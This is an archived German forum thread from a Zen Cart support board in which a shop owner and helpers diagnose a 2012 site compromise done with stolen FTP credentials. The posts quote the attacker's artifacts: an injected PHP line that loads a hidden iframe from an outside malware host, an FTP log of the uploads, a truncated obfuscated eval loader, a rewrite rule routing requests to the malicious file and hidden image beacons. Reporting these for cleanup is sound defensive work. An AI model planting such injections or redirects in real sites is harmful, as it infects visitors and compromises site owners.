Ankündigung

Einklappen
Keine Ankündigung bisher.

Dringend!!!! Trojaner auf der Homepage!!!!

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Dringend!!!! Trojaner auf der Homepage!!!!

    Ich wurde vergangene Nacht gehackt!!!

    Im root und im Admin-Verzeichniss befindet sich ein Trojaner!

    Auf den Admin kann ich nicht mehr zugreifen!!!

    Oh mein Gott! Was nun???


    Das Ding heisst Variante von w32 "Injector ZVI Trojaner"

    #2
    1. Ruhig bleiben
    2. Kaffee holen und tief durchatmen
    3. Diese Anleitung in Ruhe durcharbeiten



    4. In Zukunft: Shop immer Immer updaten

    Kommentar


      #3
      Und dass ist passiert

      Auszug aus der FTP-Log. Abgeändert habe ich die FTP-Zugangskennung auf "Loginname"

      Das Protokoll zieht sich durch bis 3706 Einträge.

      In der Accesslog taucht die IP-Adresse nicht einmal auf, dafür wird aber etwa 3 Minuten vor der Attacke eine IP angezeigt, die als

      "Pixray-Seeker/2.0 (Pixray-Seeker; +http://www.pixray.com/pixraybot; +crawlerpixray.com "angezeigt wird.

      exakt 1 Minute nach dem ANgriff taucht eine IP-Adresse auf, die als

      "Googlebot" identifiziert wird.

      Insgesamt hat die ganze Aktion nur knapp 8 bis 9 Minuten gedauert und mir mehr als 3 1/2 Stunden Arbeit verursacht.

      Die Datei "Cite.exe" fand sich in jedem Verzeichnis, in dem sich eine "
      index.htm, index.html, index.php, login.php und auch start.htm) befunden hat.

      Genau diese Dateien waren auch abgeändert mit Einträgen wie:

      <?php echo "<iframe src=\"http://sydneynorwestlimos.org:8080/index.php\" style=\"visibility: hidden; position: absolute; left: 0px; top: 0px; \" width=\"10\" height=\"10\"></iframe>"; echo "";

      ob es zudem noch andere Links gegeben hat, kann ich nicjht sagen. Ich weiß im Moment nur den einen, da ich alle anderen Dateien gleich gelöscht hatte.

      Zugang zur Seite war mit meinem FTP-Login, allerdings kann ich mir nicht vorstellen, dass das zugehörige Passwort geknackt worden sein soll, denn dieses bestand aus 12 Zeichen mit Buchstaben, Zahlen und Großkleinschreibung.




      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:43 +0100] "PASS (hidden)" 230 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "PWD" 257 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "PASV" 227 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:44 +0100] "TYPE A" 200 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:45 +0100] "LIST" 226 19247
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:45 +0100] "PASV" 227 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "LIST" 226 19247
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "CWD /" 250 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "PASV" 227 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "TYPE I" 200 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "SIZE index.html" 213 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:46 +0100] "RETR index.html" 226 6628
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "PASV" 227 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "STOR index.html" 226 6789
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:47 +0100] "PASV" 227 -
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:49 +0100] "STOR cite.exe" 226 218768
      67.21.89.38 UNKNOWN Loginname [13/Dec/2012:03:29:49 +0100] "PASV" 227 -

      Kommentar


        #4
        Zitat von Hawcha Beitrag anzeigen
        1. Ruhig bleiben
        2. Kaffee holen und tief durchatmen
        3. Diese Anleitung in Ruhe durcharbeiten



        4. In Zukunft: Shop immer Immer updaten
        Punkte 2 und 3 habe ich bestens auf die Reihe bekommen.

        Aber Punkt 1??? Ich könnte die Sau schlachten. Bei lebendigen Leib!!!

        Punkt 4: Der Shop war erst neu aufgespielt und es handelt sich um die 1.5er Version.

        Nach der Schritt-für-Schritt-Anleitung hier aus dem Forum abgesichert.


        Und Punkt 1 klappt immer noch nicht!!!


        Gruß


        Ralf

        Kommentar


          #5
          Abschließend würde ich noch das Shopverzeichnis herunter laden und die lokale Sicherung von deinem Shopverzeichnis mit
          einem Tool wie "WinMerge" (Windows) oder "Meld" (Linux) auf weitere Änderungen prüfen.

          Kommentar


            #6
            Zitat von zendo Beitrag anzeigen
            Zugang zur Seite war mit meinem FTP-Login, allerdings kann ich mir nicht vorstellen, dass das zugehörige Passwort geknackt worden sein soll, denn dieses bestand aus 12 Zeichen mit Buchstaben, Zahlen und Großkleinschreibung.
            In Zen-Cart sind nirgendwo Deine FTP Zugnagsdaten gespeichert weder in der Datenbank noch in irgendeinem File. Dieses Trojaner ist zu 99,9% nicht durch irgendeien Schwachstelle in Zen-Cart reingekommen.
            Welche Systeme laufen sonst noch auf Deinem Webspace?
            Was sagt Dein Provider dazu?

            Kommentar


              #7
              Hi Webchills,

              der Provider sagt, das wäre eine gezielte Atacke mittels eines Brutforce-Programmes gewesen.

              Außer dem Shop läuft nur noch das phpbb-Forum.

              Kommentar


                #8
                Ok. Zen-Cart hatte damit also nichts zu tun, das möcht ich hier nur festhalten, weil das ein Zen-Cart Forum ist.

                Kommentar


                  #9
                  @zendo
                  Welcher Provider ist das?

                  Kommentar


                    #10
                    1und1

                    Dualhosting

                    Kommentar


                      #11
                      Ich habs mir fast gedacht. Ich habe dasselbe heute bei Kunden festgestellt, die bei 1und1 sind.

                      Es wird eine default.php in fast alle Verzeichnisse gelegt:
                      Das ist die eigentliche Schaddatei:
                      eval(gzinflate(base64_decode xxxxxxxxx

                      Es wird eine .htacess angelegt, die die Schadsoftware default.php aufruft:
                      <IfModule mod_rewrite.c>
                      RewriteEngine On
                      RewriteBase /
                      RewriteCond %{REQUEST_FILENAME} !-f
                      RewriteRule ^[a-z0-9]{1,4}[.](htm|pdf|jar) default.php [L]
                      </IfModule>

                      index.php wird versucht zu ändern mit:
                      <img height="1" width="1" border="0" src="http://46.45.183.138/335911.jpg">

                      Es werden 2 leere Textdateien in fast alle Verzeichnisse gelegt:
                      .f21926-334238.txt
                      und
                      .f21928-334239.txt

                      Es wird die DEINADMIN/index.php verändert
                      <img height="1" width="1" border="0" src="http://46.45.183.138/335911.jpg">

                      Es werden index.html in diversen Verzichnissen geändert, z.B. download/index.html oder editors/index.html:
                      <img height="1" width="1" border="0" src="http://46.45.183.138/335518.jpg">

                      All das wird mit dem FTP-User gemacht.

                      Für mich schaut das so aus, dass das ein gröberes Problem bei 1und1 ist.

                      Kommentar


                        #12
                        Ich überprüfe dieses gerade noch bei mir.

                        Bei mir waren es die Änderungen wie weiter oben im Thread beschrieben.

                        In welchem Ordner war die htacces abgeändert?

                        Kommentar


                          #13
                          ALso die Default.php und die leeren txt-Dateien gibt es bei mir nicht.

                          Läuft wohl in verschiedenen Schienen ab,.

                          Hast Du eine Idee, wie man die Sache zusätzlich absichern kann?

                          Die htaccess in jeden Ordner mit welchem Inhalt und alles auf Schreibschutz wäre nun eine Idee von mir?


                          Gruß


                          Ralf

                          Kommentar


                            #14
                            Zitat von zendo Beitrag anzeigen
                            In welchem Ordner war die htacces abgeändert?
                            In der Regel die auf der ersten Ebene, das ist am effektivsten. Wenn dort noch was anderes als Zen-Cart läuft ist das auch egal, es wird einfach in alle Verzeichnisse gelegt, es reicht also nicht, nur die Zen-Cart Installation zu prüfen sondern wirklich alle Ordner, die auf dem Server bei diesem Account herumliegen. Ein guter Hinweis ist das Änderungsdatum, einfach alle entsprechenden index.html, index.php und .htaccess prüfen.

                            Kommentar


                              #15
                              Zitat von zendo Beitrag anzeigen
                              Läuft wohl in verschiedenen Schienen ab,.
                              Hast Du eine Idee, wie man die Sache zusätzlich absichern kann?
                              Wie das wirklich abläuft oder abgelaufen ist, kann nur 1und1 sagen, jedenfalls wurde das mit den FTP Zugangsdaten gemacht und die müssen irgendwo hergekommen sein.
                              Was Zen-Cart betrifft wüsste ich nicht, was Du da noch absichern kannst. Wenn ich FTP Zugang habe, dann kann ich alles machen, das ist der Schlüssel zu allem.

                              Kommentar

                              Info zu diesem Forenarchiv:
                              Mit Release von 1.5.7 wurde die deutsche Zen Cart Version auf eine reine DIY-Lösung umgestellt.
                              Für einen Support via Forum stehen keine personellen und zeitlichen Ressourcen mehr zur Verfügung.
                              Dieses Supportforum bleibt im Nur-Lesen-Modus als Wissensarchiv noch online verfügbar.
                              PM Funktionalität, Registrierung und Posten neuer Beiträge sind deaktiviert.
                              Zugriff auf Anhänge in den Postings ist auch ohne Registrierung/Einloggen möglich.
                              FAQ und Downloadbereich des Forums wurden in die neue umfangreiche Knowledgebase auf der zen-cart-pro.at Website übernommen.

                              Das Development der deutschen Zen Cart Version geht wie bisher auf Github weiter.
                              Wir werden auch weiterhin neue Versionen bereitstellen und die Onlinedokumentation/Knowledgebase aktualisieren.
                              Fehler in der Software können auf Github als Issues gemeldet werden.
                              Follow us
                              aktuelle version
                              Zen Cart 1.5.7g deutsch
                              vom 12.12.2023
                              [Download]
                              Lädt...
                              X